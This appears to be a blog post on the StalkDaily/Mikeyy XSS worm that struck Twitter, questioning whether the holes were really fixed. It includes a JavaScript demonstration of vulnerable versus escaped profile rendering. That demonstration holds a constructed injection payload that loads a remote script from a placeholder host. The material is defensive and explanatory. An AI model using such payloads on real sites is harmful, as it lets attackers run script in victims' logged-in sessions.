From Saturday through Monday, Twitter, the popular social networking site, was hit by wave after wave of cross-site scripting attacks. This so-called worm first manifested as the "StalkDaily.com" XSS attack and morphed as the weekend progressed. The BBC has reported "Twitter all clear after worm wave" and other news sites have repeated their story. However, Twitter has yet to update their status page or blog to state that the XSS holes have been plugged. The last status update said: "We are currently addressing a new manifestation of the worm attack. No passwords, phone numbers, or other sensitive information were compromised as part of this renewed attack".
So, is Twitter finally free of the StalkDaily/Mikeyy XSS attacks? I'm not so sure.
On 20th March, Information Week published an article called "Twitter Vulnerability Exposed", which reported a "...serious cross-site scripting (XSS) vulnerability that could allow an attacker to hijack users' accounts or, in conjunction with other exploit code, compromise their computers." Secure Science researchers Lance James and Eric Wastl published a proof-of-concept on the Web and said they had notified Twitter. As Lance James, chief scientist with Secure Science, put it, their script "is an innocuous proof of concept that forces users to send out a predetermined twitter message, but it could be repurposed into a very nasty worm". Like the recent worm, this exploit relied upon JavaScript to inject tweets through an XSS vulnerability.
Twitter had known about this for 3 weeks before Michael Mooney let his JavaScript exploits loose!
Twitter had a heck of a job cleaning up these latest attacks. In the initial attack the XSS scripts were being loaded from the StalkDaily.com site, as well as from Mikeyy's mikeyylolz.uuuq .com site (since shut down). Mutated versions then started coming from ireel .com, bambamyo.110mb .com, and yet another site on uuuq.com. These were all exploiting related security vulnerabilities in Twitter.
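To make concrete what "injecting script through an XSS vulnerability" means in practice, here is an added example in JavaScript. It is my own illustration, not Twitter's code and not the worm's actual payload: a server-side renderer for a user profile whose URL field is concatenated straight into markup, beside a hardened version that escapes for the attribute and text contexts and only allows http(s) links. The profile fields, the example.invalid hostnames and the worm.js filename are all constructed for the demonstration. A remote script pulled in this way runs in the viewer's own logged-in session, which is what lets it send tweets on their behalf; that propagation step is described above but is not modelled here.

```javascript
// Added example (not Twitter's code, not the real worm): a stored XSS in a
// user-controlled profile field beside the escaping that closes the hole.

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Only allow http(s) URLs in an href; anything else (javascript:, data:, ...)
// is replaced by "#". Escaping alone does not stop a javascript: link.
function safeHref(url) {
  const s = String(url).trim();
  return /^https?:\/\//i.test(s) ? s : "#";
}

// VULNERABLE: user-supplied profile fields are concatenated into markup as-is,
// so a URL containing a quote and a closing bracket breaks out of the attribute.
function renderProfileUnsafe(profile) {
  return (
    '<div class="profile">' +
    '<a href="' + profile.url + '">' + profile.name + "</a>" +
    "</div>"
  );
}

// HARDENED: allowlist the scheme, then escape for the attribute context (href)
// and the text context (link text). The same bytes come out as inert text.
function renderProfileSafe(profile) {
  return (
    '<div class="profile">' +
    '<a href="' + escapeHtml(safeHref(profile.url)) + '">' +
    escapeHtml(profile.name) + "</a>" +
    "</div>"
  );
}

// Crude check used only to show the effect: list the src of every <script>
// tag that made it into the rendered HTML (a real check would parse the DOM).
function extractScriptSources(html) {
  const out = [];
  const re = /<script[^>]*\bsrc=["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Constructed sample data (hypothetical, not the real worm payload): a profile
// whose URL closes the href attribute and the anchor, then loads a remote script.
const HOSTILE_PROFILE = {
  name: "victim",
  url: 'http://example.invalid/"><script src="http://example.invalid/worm.js"></script><a href="',
};

// Constructed benign profile: angle bracket in the display name must survive as text.
const BENIGN_PROFILE = { name: "Alice <3", url: "https://example.com/alice" };

console.log("unsafe render :", renderProfileUnsafe(HOSTILE_PROFILE));
console.log("scripts loaded:", extractScriptSources(renderProfileUnsafe(HOSTILE_PROFILE)));
console.log("safe render   :", renderProfileSafe(HOSTILE_PROFILE));
console.log("scripts loaded:", extractScriptSources(renderProfileSafe(HOSTILE_PROFILE)));
```

Note that the hostile URL starts with `http://`, so the scheme allowlist alone lets it through; it is the attribute-context escaping that keeps the quote and brackets from ending the `href`. Both controls are needed: escaping stops the break-out, the allowlist stops a `javascript:` link that needs no break-out at all.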
Now, what is so concerning is this: after the first day of attacks Twitter posted a status update that said:
Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability. We’ve taken steps to remove the offending updates, and to close the holes that allowed this “worm” to spread.
No passwords, phone numbers, or other sensitive information were compromised as part of this attack.
If they had truly closed the holes, how did the later variants get through? Deleting the fake tweets and cleaning up affected accounts removes the symptoms; the hole itself is only closed when the code that renders user-supplied input stops emitting it as live markup, and each mutation arriving from a new domain suggests that had not yet happened. It's clear that Twitter has deleted the fake tweets and cleaned up some accounts, but have they secured their code? I'm not so sure, and I won't be surprised if we see similar XSS attacks in the future.